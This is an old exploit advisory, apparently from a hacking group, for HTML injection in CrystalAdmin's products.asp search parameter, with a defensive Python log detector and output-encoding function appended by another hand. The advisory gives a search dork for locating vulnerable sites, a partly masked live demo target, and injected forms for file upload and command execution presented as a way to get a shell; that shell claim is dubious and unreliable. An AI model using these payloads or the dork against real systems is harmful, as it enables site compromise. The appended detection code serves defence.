CrystalAdmin Html Injection Vulnerability

2013.01.01
Credit: silent
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

#################################################################
=> Title: CrystalAdmin Html Injection Vulnerability
=> Author: silent
=> Credit: Rainarmy Security Team
=> Email: hacker.silent23@yahoo.com
##################################################################
=> Dork: inurl:/catalogue/products.asp?s=
=> Sample: http://www.target.com/catalogue/products.asp?s=[Html code]
=> Demo: http://www.aiXXXe.co.uk/catalogue/products.asp?s=[html code]
=> Html code: such as
=> <marquee>html injection</marquee>
###################################################################
=> For getting a shell with HTML injection, you should inject the shell with HTML code such as this:

<form action="?dir=." method="POST" enctype="multipart/form-data">
<tr>
<td>Uploud file:<input name="uploadfile" value="" type="file" class="input" size="30" >
<input name="doupfile" value="up" type="submit" class="input" size="30" >
<input name="uploaddir" value="." type="hidden" class="input" size="30" >
</td>
</tr>
</form>

or a cmd shell like this:

<form action="" method="POST" >
<tr>
<td>cmd:<select class="input" name="execfunc" >
<option value="system">system</option><option value="passthru">passthru</option>
<option value="exec">exec</option><option value="shell_exec">shell_exec</option>
<option value="popen">popen</option></select>
<input name="command" value="" type="text" class="input" size="30" >
<input name="Run" value="command" type="submit" class="input" size="30" >
</td>
</tr>
</form>

Also, this trick works when safe mode is off.
###################################################################
Special thanks to administrator, Data War, Time outer
###################################################################
wwww.rainarmy.com & www.rainarmy.com/forums
###################################################################

References:

http://wwww.rainarmy.com
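
Added example, not part of the original advisory: a log check that flags requests to /catalogue/products.asp whose s parameter decodes to HTML markup, plus the output encoding that neutralizes the reflected value. The log layout, sample lines, and function names are assumptions constructed for illustration.

```python
import re
from html import escape
from urllib.parse import urlsplit, parse_qs, unquote_plus

# Constructed access-log lines (client, method, URI, status); not from a real server.
SAMPLE_LOG = [
    '198.51.100.7 GET /catalogue/products.asp?s=garden+chairs 200',
    '198.51.100.9 GET /catalogue/products.asp?s=%3Cmarquee%3Ehtml+injection%3C%2Fmarquee%3E 200',
    '203.0.113.4 GET /catalogue/products.asp?s=%253Cform%2520action%253D%2522%253Fdir%253D.%2522%253E 200',
    '203.0.113.5 GET /catalogue/products.asp?s=price+%3C+20 200',
    '203.0.113.6 GET /catalogue/other.asp?s=%3Cb%3Ex%3C%2Fb%3E 200',
]

TARGET_PATH = "/catalogue/products.asp"  # path named in the advisory
TAG_RE = re.compile(r"<\s*/?\s*[a-zA-Z][^>]*>")  # opening or closing HTML tag

def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded markup is also seen."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def find_html_injection(lines):
    """Return (client, decoded_s) for requests whose s parameter carries HTML tags."""
    hits = []
    for line in lines:
        client, _method, uri, _status = line.split(" ", 3)
        parts = urlsplit(uri)
        if parts.path.lower() != TARGET_PATH:
            continue
        # parse_qs already decodes once; fully_decode catches further layers.
        for raw in parse_qs(parts.query, keep_blank_values=True).get("s", []):
            value = fully_decode(raw)
            if TAG_RE.search(value):
                hits.append((client, value))
    return hits

def render_search_term(term):
    """Output-encode the term before reflecting it into the page."""
    return escape(term, quote=True)

if __name__ == "__main__":
    for client, value in find_html_injection(SAMPLE_LOG):
        print(client, "->", render_search_term(value))
```

A bare "<" in a legitimate search such as "price < 20" is not flagged, because the pattern requires a tag name after the bracket.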

